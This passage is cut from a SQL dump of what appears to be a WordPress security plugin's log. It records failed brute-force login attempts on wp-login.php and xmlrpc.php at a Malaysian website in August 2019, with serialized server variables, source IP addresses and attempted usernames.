Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.27.236.196\";s:11:\"REMOTE_PORT\";s:5:\"58172\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSWTR90bn5mtr-PXqrfJAAAAFE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566873165.7368\";s:12:\"REQUEST_TIME\";s:10:\"1566873165\";}}','notice','2019-08-27 02:32:47','2019-08-27 02:32:46',17685424,19176352,'https://bintara.com.my/wp-login.php',1,0,'103.27.236.196'),(23351,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.17.213\";s:11:\"REMOTE_PORT\";s:5:\"35246\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSY2g0@TGWC-1tzGX5uyQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566873818.8638\";s:12:\"REQUEST_TIME\";s:10:\"1566873818\";}}','notice','2019-08-27 02:43:40','2019-08-27 02:43:39',17682160,19171656,'https://bintara.com.my/wp-login.php',1,0,'134.209.17.213'),(23352,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.203.40.162\";s:11:\"REMOTE_PORT\";s:5:\"58124\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSazR90bn5mtr-PXqrjWgAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566874317.4872\";s:12:\"REQUEST_TIME\";s:10:\"1566874317\";}}','notice','2019-08-27 02:51:58','2019-08-27 02:51:57',17685512,19177848,'https://bintara.com.my/wp-login.php',1,0,'159.203.40.162'),(23353,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.11.99\";s:11:\"REMOTE_PORT\";s:5:\"50790\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWShrw0@TGWC-1tzGX5xRwAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566876079.7058\";s:12:\"REQUEST_TIME\";s:10:\"1566876079\";}}','notice','2019-08-27 03:21:21','2019-08-27 03:21:20',17683888,19174736,'https://bintara.com.my/wp-login.php',1,0,'142.4.11.99'),(23354,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.57.44\";s:11:\"REMOTE_PORT\";s:5:\"41494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSkLLdCvC5@KvzqwiEowAAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566876716.472\";s:12:\"REQUEST_TIME\";s:10:\"1566876716\";}}','notice','2019-08-27 03:31:58','2019-08-27 03:31:56',17684672,19175008,'https://bintara.com.my/wp-login.php',1,0,'139.59.57.44'),(23355,0,'brute_force','invalid-login::username-mark','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"mark\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.57.44\";s:11:\"REMOTE_PORT\";s:5:\"41856\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSkLmXkG1atThADMYGchgAAAM4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566876718.9745\";s:12:\"REQUEST_TIME\";s:10:\"1566876718\";}}','notice','2019-08-27 03:32:00','2019-08-27 03:31:59',18201832,19500392,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.57.44'),(23356,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.52.126\";s:11:\"REMOTE_PORT\";s:5:\"53088\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSmpbdCvC5@KvzqwiEqtAAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566877349.7284\";s:12:\"REQUEST_TIME\";s:10:\"1566877349\";}}','notice','2019-08-27 03:42:31','2019-08-27 03:42:30',17689872,19175960,'https://bintara.com.my/wp-login.php',1,0,'178.128.52.126'),(23357,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.52.126\";s:11:\"REMOTE_PORT\";s:5:\"53088\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSmpbdCvC5@KvzqwiEqtAAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566877349.7284\";s:12:\"REQUEST_TIME\";s:10:\"1566877349\";}}','notice','2019-08-27 03:42:31','2019-08-27 03:42:30',17851216,19175960,'https://bintara.com.my/wp-login.php',1,0,'178.128.52.126'),(23358,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.52.126\";s:11:\"REMOTE_PORT\";s:5:\"54396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSmqg0@TGWC-1tzGX5y-gAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566877354.4927\";s:12:\"REQUEST_TIME\";s:10:\"1566877354\";}}','notice','2019-08-27 03:42:35','2019-08-27 03:42:34',18198496,19495264,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.52.126'),(23359,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 